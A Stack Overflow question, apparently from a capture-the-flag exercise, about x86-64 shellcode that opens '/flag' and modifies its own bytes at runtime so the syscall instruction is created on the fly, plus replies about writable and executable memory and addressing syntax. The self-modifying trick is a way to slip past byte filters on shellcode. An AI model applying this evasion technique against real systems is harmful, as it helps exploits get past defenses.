0

I am trying to modify .byte 0x0e and .byte 0x04. I tried to use inc byte ptr [rip+offset] to get to the address of .byte 0x0e and .byte 0x04 and change them. I ran gef and got SIGSEGV at those command. The offset should be correct as I ran objdump and it shows the index byte of hex correctly.

I tried to use lea r11, [_start] to get to the address but it did not work when I assemble the code. 

.global _start
_start:
.intel_syntax noprefix
    mov rdx, 0x00000067616c662f
    push rdx
    mov rax, 2
    mov rdi, rsp
    xor rsi,rsi
        inc byte ptr [rip+0xc]
        inc byte ptr [rip+0x6]
        inc byte ptr [rip+0x1]
    .byte 0x0d
    .byte 0x04
  • .byte 0x0d should be modified as .byte 0x0f
  • .byte 0x04 should be modified as .byte 0x05
  • Then a syscall should be initiated with 0f 05
Michael Petch
  • 46,082
  • 8
  • 107
  • 198
Gan Sama
  • 49
  • 1
  • 3
  • 2
    Code (the `.text` section) is in executable read only pages. It can't be written to by default. This answer may be related: https://stackoverflow.com/questions/27581279/make-text-segment-writable-elf . Your exploit though when running in a target program won't have this problem because the stack is writeable but in that case you have to mark the stack as executable (ie: https://stackoverflow.com/a/57846177/3857942 ) – Michael Petch Sep 13 '19 at 16:20

1 Answers1

-1

Wouldn't you want your .byte to be 0x0e, if you want to inc it to 0x0f? The syntax you want for the lea statement is 

lea r11, _start[rip]

You can put your .byte pieces under another section and inc byte ptr section_name[rip] so you don't need to know the actual distance to the memory in question, then jmp to the section to execute the syscall

Bhargav Rao
  • 50,140
  • 28
  • 121
  • 140
Tyler
  • 1
  • 1